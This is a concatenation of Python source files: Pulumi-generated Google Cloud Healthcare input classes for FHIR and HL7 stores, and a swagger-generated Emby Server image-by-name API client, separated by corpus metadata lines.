the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ pulumi.set(__self__, "pubsub_topic", pubsub_topic) @property @pulumi.getter(name="pubsubTopic") def pubsub_topic(self) -> pulumi.Input[str]: """ The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. 
It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ return pulumi.get(self, "pubsub_topic") @pubsub_topic.setter def pubsub_topic(self, value: pulumi.Input[str]): pulumi.set(self, "pubsub_topic", value) @pulumi.input_type class FhirStoreStreamConfigArgs: def __init__(__self__, *, bigquery_destination: pulumi.Input['FhirStoreStreamConfigBigqueryDestinationArgs'], resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None): """ :param pulumi.Input['FhirStoreStreamConfigBigqueryDestinationArgs'] bigquery_destination: The destination BigQuery structure that contains both the dataset location and corresponding schema config. The output is organized in one table per resource type. The server reuses the existing tables (if any) that are named after the resource types, e.g. "Patient", "Observation". When there is no existing table for a given resource type, the server attempts to create one. See the [streaming config reference](https://cloud.google.com/healthcare/docs/reference/rest/v1beta1/projects.locations.datasets.fhirStores#streamconfig) for more details. Structure is documented below. :param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types: Supply a FHIR resource type (such as "Patient" or "Observation"). See https://www.hl7.org/fhir/valueset-resource-types.html for a list of all FHIR resource types. The server treats an empty list as an intent to stream all the supported resource types in this FHIR store. 
""" pulumi.set(__self__, "bigquery_destination", bigquery_destination) if resource_types is not None: pulumi.set(__self__, "resource_types", resource_types) @property @pulumi.getter(name="bigqueryDestination") def bigquery_destination(self) -> pulumi.Input['FhirStoreStreamConfigBigqueryDestinationArgs']: """ The destination BigQuery structure that contains both the dataset location and corresponding schema config. The output is organized in one table per resource type. The server reuses the existing tables (if any) that are named after the resource types, e.g. "Patient", "Observation". When there is no existing table for a given resource type, the server attempts to create one. See the [streaming config reference](https://cloud.google.com/healthcare/docs/reference/rest/v1beta1/projects.locations.datasets.fhirStores#streamconfig) for more details. Structure is documented below. """ return pulumi.get(self, "bigquery_destination") @bigquery_destination.setter def bigquery_destination(self, value: pulumi.Input['FhirStoreStreamConfigBigqueryDestinationArgs']): pulumi.set(self, "bigquery_destination", value) @property @pulumi.getter(name="resourceTypes") def resource_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Supply a FHIR resource type (such as "Patient" or "Observation"). See https://www.hl7.org/fhir/valueset-resource-types.html for a list of all FHIR resource types. The server treats an empty list as an intent to stream all the supported resource types in this FHIR store. 
""" return pulumi.get(self, "resource_types") @resource_types.setter def resource_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "resource_types", value) @pulumi.input_type class FhirStoreStreamConfigBigqueryDestinationArgs: def __init__(__self__, *, dataset_uri: pulumi.Input[str], schema_config: pulumi.Input['FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs']): """ :param pulumi.Input[str] dataset_uri: BigQuery URI to a dataset, up to 2000 characters long, in the format bq://projectId.bqDatasetId :param pulumi.Input['FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs'] schema_config: The configuration for the exported BigQuery schema. Structure is documented below. """ pulumi.set(__self__, "dataset_uri", dataset_uri) pulumi.set(__self__, "schema_config", schema_config) @property @pulumi.getter(name="datasetUri") def dataset_uri(self) -> pulumi.Input[str]: """ BigQuery URI to a dataset, up to 2000 characters long, in the format bq://projectId.bqDatasetId """ return pulumi.get(self, "dataset_uri") @dataset_uri.setter def dataset_uri(self, value: pulumi.Input[str]): pulumi.set(self, "dataset_uri", value) @property @pulumi.getter(name="schemaConfig") def schema_config(self) -> pulumi.Input['FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs']: """ The configuration for the exported BigQuery schema. Structure is documented below. """ return pulumi.get(self, "schema_config") @schema_config.setter def schema_config(self, value: pulumi.Input['FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs']): pulumi.set(self, "schema_config", value) @pulumi.input_type class FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs: def __init__(__self__, *, recursive_structure_depth: pulumi.Input[int], schema_type: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[int] recursive_structure_depth: The depth for all recursive structures in the output analytics schema. 
For example, concept in the CodeSystem resource is a recursive structure; when the depth is 2, the CodeSystem table will have a column called concept.concept but not concept.concept.concept. If not specified or set to 0, the server will use the default value 2. The maximum depth allowed is 5. :param pulumi.Input[str] schema_type: Specifies the output schema type. Only ANALYTICS is supported at this time. * ANALYTICS: Analytics schema defined by the FHIR community. See https://github.com/FHIR/sql-on-fhir/blob/master/sql-on-fhir.md. Default value is `ANALYTICS`. Possible values are `ANALYTICS`. """ pulumi.set(__self__, "recursive_structure_depth", recursive_structure_depth) if schema_type is not None: pulumi.set(__self__, "schema_type", schema_type) @property @pulumi.getter(name="recursiveStructureDepth") def recursive_structure_depth(self) -> pulumi.Input[int]: """ The depth for all recursive structures in the output analytics schema. For example, concept in the CodeSystem resource is a recursive structure; when the depth is 2, the CodeSystem table will have a column called concept.concept but not concept.concept.concept. If not specified or set to 0, the server will use the default value 2. The maximum depth allowed is 5. """ return pulumi.get(self, "recursive_structure_depth") @recursive_structure_depth.setter def recursive_structure_depth(self, value: pulumi.Input[int]): pulumi.set(self, "recursive_structure_depth", value) @property @pulumi.getter(name="schemaType") def schema_type(self) -> Optional[pulumi.Input[str]]: """ Specifies the output schema type. Only ANALYTICS is supported at this time. * ANALYTICS: Analytics schema defined by the FHIR community. See https://github.com/FHIR/sql-on-fhir/blob/master/sql-on-fhir.md. Default value is `ANALYTICS`. Possible values are `ANALYTICS`. 
""" return pulumi.get(self, "schema_type") @schema_type.setter def schema_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "schema_type", value) @pulumi.input_type class Hl7StoreIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class Hl7StoreIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, 
"description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class Hl7StoreNotificationConfigArgs: def __init__(__self__, *, pubsub_topic: pulumi.Input[str]): """ :param pulumi.Input[str] pubsub_topic: The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ pulumi.set(__self__, "pubsub_topic", pubsub_topic) @property @pulumi.getter(name="pubsubTopic") def pubsub_topic(self) -> pulumi.Input[str]: """ The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. 
""" return pulumi.get(self, "pubsub_topic") @pubsub_topic.setter def pubsub_topic(self, value: pulumi.Input[str]): pulumi.set(self, "pubsub_topic", value) @pulumi.input_type class Hl7StoreNotificationConfigsArgs: def __init__(__self__, *, pubsub_topic: pulumi.Input[str], filter: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] pubsub_topic: The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. :param pulumi.Input[str] filter: Restricts notifications sent for messages matching a filter. If this is empty, all messages are matched. Syntax: https://cloud.google.com/appengine/docs/standard/python/search/query_strings Fields/functions available for filtering are: * messageType, from the MSH-9.1 field. For example, NOT messageType = "ADT". * send_date or sendDate, the YYYY-MM-DD date the message was sent in the dataset's timeZone, from the MSH-7 segment. For example, send_date < "2017-01-02". * sendTime, the timestamp when the message was sent, using the RFC3339 time format for comparisons, from the MSH-7 segment. For example, sendTime < "2017-01-02T00:00:00-05:00". * sendFacility, the care center that the message came from, from the MSH-4 segment. For example, sendFacility = "ABC". * PatientId(value, type), which matches if the message lists a patient having an ID of the given value and type in the PID-2, PID-3, or PID-4 segments. For example, PatientId("123456", "MRN"). 
* labels.x, a string value of the label with key x as set using the Message.labels map. For example, labels."priority"="high". The operator :* can be used to assert the existence of a label. For example, labels."priority":*. """ pulumi.set(__self__, "pubsub_topic", pubsub_topic) if filter is not None: pulumi.set(__self__, "filter", filter) @property @pulumi.getter(name="pubsubTopic") def pubsub_topic(self) -> pulumi.Input[str]: """ The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ return pulumi.get(self, "pubsub_topic") @pubsub_topic.setter def pubsub_topic(self, value: pulumi.Input[str]): pulumi.set(self, "pubsub_topic", value) @property @pulumi.getter def filter(self) -> Optional[pulumi.Input[str]]: """ Restricts notifications sent for messages matching a filter. If this is empty, all messages are matched. Syntax: https://cloud.google.com/appengine/docs/standard/python/search/query_strings Fields/functions available for filtering are: * messageType, from the MSH-9.1 field. For example, NOT messageType = "ADT". * send_date or sendDate, the YYYY-MM-DD date the message was sent in the dataset's timeZone, from the MSH-7 segment. For example, send_date < "2017-01-02". * sendTime, the timestamp when the message was sent, using the RFC3339 time format for comparisons, from the MSH-7 segment. For example, sendTime < "2017-01-02T00:00:00-05:00". 
* sendFacility, the care center that the message came from, from the MSH-4 segment. For example, sendFacility = "ABC". * PatientId(value, type), which matches if the message lists a patient having an ID of the given value and type in the PID-2, PID-3, or PID-4 segments. For example, PatientId("123456", "MRN"). * labels.x, a string value of the label with key x as set using the Message.labels map. For example, labels."priority"="high". The operator :* can be used to assert the existence of a label. For example, labels."priority":*. """ return pulumi.get(self, "filter") @filter.setter def filter(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "filter", value) @pulumi.input_type class Hl7StoreParserConfigArgs: def __init__(__self__, *, allow_null_header: Optional[pulumi.Input[bool]] = None, schema: Optional[pulumi.Input[str]] = None, segment_terminator: Optional[pulumi.Input[str]] = None, version: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[bool] allow_null_header: Determines whether messages with no header are allowed. :param pulumi.Input[str] schema: JSON encoded string for schemas used to parse messages in this store if schematized parsing is desired. :param pulumi.Input[str] segment_terminator: Byte(s) to be used as the segment terminator. If this is unset, '\r' will be used as segment terminator. A base64-encoded string. :param pulumi.Input[str] version: The version of the unschematized parser to be used when a custom `schema` is not set. Default value is `V1`. Possible values are `V1` and `V2`. 
""" if allow_null_header is not None: pulumi.set(__self__, "allow_null_header", allow_null_header) if schema is not None: pulumi.set(__self__, "schema", schema) if segment_terminator is not None: pulumi.set(__self__, "segment_terminator", segment_terminator) if version is not None: pulumi.set(__self__, "version", version) @property @pulumi.getter(name="allowNullHeader") def allow_null_header(self) -> Optional[pulumi.Input[bool]]: """ Determines whether messages with no header are allowed. """ return pulumi.get(self, "allow_null_header") @allow_null_header.setter def allow_null_header(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "allow_null_header", value) @property @pulumi.getter def schema(self) -> Optional[pulumi.Input[str]]: """ JSON encoded string for schemas used to parse messages in this store if schematized parsing is desired. """ return pulumi.get(self, "schema") @schema.setter def schema(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "schema", value) @property @pulumi.getter(name="segmentTerminator") def segment_terminator(self) -> Optional[pulumi.Input[str]]: """ Byte(s) to be used as the segment terminator. If this is unset, '\r' will be used as segment terminator. A base64-encoded string. """ return pulumi.get(self, "segment_terminator") @segment_terminator.setter def segment_terminator(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "segment_terminator", value) @property @pulumi.getter def version(self) -> Optional[pulumi.Input[str]]: """ The version of the unschematized parser to be used when a custom `schema` is not set. Default value is `V1`. Possible values are `V1` and `V2`. """ return pulumi.get(self, "version") @version.setter def version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "version", value)
43.174883
239
0.676118
4,356
36,785
5.586547
0.082645
0.082268
0.079392
0.036696
0.85375
0.805137
0.79285
0.766879
0.756236
0.747606
0
0.004606
0.22675
36,785
851
240
43.225617
0.850935
0.365665
0
0.72296
1
0
0.125263
0.054565
0
0
0
0
0
1
0.216319
false
0
0.009488
0.056926
0.352941
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
9
40120208d780ce393f0ae7c0ce9afd903a17ab95
22,774
py
Python
embyapi/api/image_by_name_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
embyapi/api/image_by_name_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
embyapi/api/image_by_name_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
# coding: utf-8 """ Emby Server API Explore the Emby Server API # noqa: E501 OpenAPI spec version: 4.1.1.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from embyapi.api_client import ApiClient class ImageByNameServiceApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def get_images_general(self, **kwargs): # noqa: E501 """Gets all general images by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_general(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_general_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_images_general_with_http_info(**kwargs) # noqa: E501 return data def get_images_general_with_http_info(self, **kwargs): # noqa: E501 """Gets all general images by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_general_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. 
""" all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_general" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'application/xml']) # noqa: E501 # Authentication setting auth_settings = ['apikeyauth', 'embyauth'] # noqa: E501 return self.api_client.call_api( '/Images/General', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[ImageByNameInfo]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_general_by_name_by_type(self, name, type, **kwargs): # noqa: E501 """Gets a general image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_general_by_name_by_type(name, type, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str type: Image Type (primary, backdrop, logo, etc). (required) :return: None If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_general_by_name_by_type_with_http_info(name, type, **kwargs) # noqa: E501 else: (data) = self.get_images_general_by_name_by_type_with_http_info(name, type, **kwargs) # noqa: E501 return data def get_images_general_by_name_by_type_with_http_info(self, name, type, **kwargs): # noqa: E501 """Gets a general image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_general_by_name_by_type_with_http_info(name, type, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str type: Image Type (primary, backdrop, logo, etc). (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'type'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_general_by_name_by_type" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if ('name' not in params or params['name'] is None): raise ValueError("Missing the required parameter `name` when calling `get_images_general_by_name_by_type`") # noqa: E501 # verify the required parameter 'type' is set if ('type' not in params or params['type'] is None): raise ValueError("Missing the required parameter `type` when calling `get_images_general_by_name_by_type`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['Name'] = params['name'] # noqa: E501 if 'type' in params: path_params['Type'] = params['type'] # noqa: 
E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/Images/General/{Name}/{Type}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_mediainfo(self, **kwargs): # noqa: E501 """Gets all media info image by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_mediainfo(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_mediainfo_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_images_mediainfo_with_http_info(**kwargs) # noqa: E501 return data def get_images_mediainfo_with_http_info(self, **kwargs): # noqa: E501 """Gets all media info image by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_mediainfo_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. 
""" all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_mediainfo" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'application/xml']) # noqa: E501 # Authentication setting auth_settings = ['apikeyauth', 'embyauth'] # noqa: E501 return self.api_client.call_api( '/Images/MediaInfo', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[ImageByNameInfo]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_mediainfo_by_theme_by_name(self, name, theme, **kwargs): # noqa: E501 """Gets a media info image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_mediainfo_by_theme_by_name(name, theme, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str theme: The theme to get the image from (required) :return: None If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_mediainfo_by_theme_by_name_with_http_info(name, theme, **kwargs) # noqa: E501 else: (data) = self.get_images_mediainfo_by_theme_by_name_with_http_info(name, theme, **kwargs) # noqa: E501 return data def get_images_mediainfo_by_theme_by_name_with_http_info(self, name, theme, **kwargs): # noqa: E501 """Gets a media info image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_mediainfo_by_theme_by_name_with_http_info(name, theme, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str theme: The theme to get the image from (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'theme'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_mediainfo_by_theme_by_name" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if ('name' not in params or params['name'] is None): raise ValueError("Missing the required parameter `name` when calling `get_images_mediainfo_by_theme_by_name`") # noqa: E501 # verify the required parameter 'theme' is set if ('theme' not in params or params['theme'] is None): raise ValueError("Missing the required parameter `theme` when calling `get_images_mediainfo_by_theme_by_name`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['Name'] = params['name'] # noqa: E501 if 'theme' in params: path_params['Theme'] = 
params['theme'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/Images/MediaInfo/{Theme}/{Name}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_ratings(self, **kwargs): # noqa: E501 """Gets all rating images by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_ratings(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_ratings_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_images_ratings_with_http_info(**kwargs) # noqa: E501 return data def get_images_ratings_with_http_info(self, **kwargs): # noqa: E501 """Gets all rating images by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_ratings_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. 
""" all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_ratings" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'application/xml']) # noqa: E501 # Authentication setting auth_settings = ['apikeyauth', 'embyauth'] # noqa: E501 return self.api_client.call_api( '/Images/Ratings', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[ImageByNameInfo]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_ratings_by_theme_by_name(self, name, theme, **kwargs): # noqa: E501 """Gets a rating image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_ratings_by_theme_by_name(name, theme, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str theme: The theme to get the image from (required) :return: None If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_ratings_by_theme_by_name_with_http_info(name, theme, **kwargs) # noqa: E501 else: (data) = self.get_images_ratings_by_theme_by_name_with_http_info(name, theme, **kwargs) # noqa: E501 return data def get_images_ratings_by_theme_by_name_with_http_info(self, name, theme, **kwargs): # noqa: E501 """Gets a rating image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_ratings_by_theme_by_name_with_http_info(name, theme, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str theme: The theme to get the image from (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'theme'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_ratings_by_theme_by_name" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if ('name' not in params or params['name'] is None): raise ValueError("Missing the required parameter `name` when calling `get_images_ratings_by_theme_by_name`") # noqa: E501 # verify the required parameter 'theme' is set if ('theme' not in params or params['theme'] is None): raise ValueError("Missing the required parameter `theme` when calling `get_images_ratings_by_theme_by_name`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['Name'] = params['name'] # noqa: E501 if 'theme' in params: path_params['Theme'] = params['theme'] # 
noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/Images/Ratings/{Theme}/{Name}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)
38.469595
137
0.60894
2,687
22,774
4.894306
0.062151
0.049882
0.025549
0.032849
0.961372
0.959927
0.95795
0.951258
0.946164
0.940081
0
0.016131
0.303153
22,774
591
138
38.534687
0.812539
0.328884
0
0.803175
1
0
0.181533
0.062696
0
0
0
0
0
1
0.04127
false
0
0.012698
0
0.114286
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
402cf7f9557f5187f85882c47d299f9119ff4a81
246
py
Python
practice_platform_backend/account/__init__.py
Jamison-Chen/practice_platform_backend
860b2e3bd7d57eb7db0e98f5fdda29565951e532
[ "MIT" ]
null
null
null
practice_platform_backend/account/__init__.py
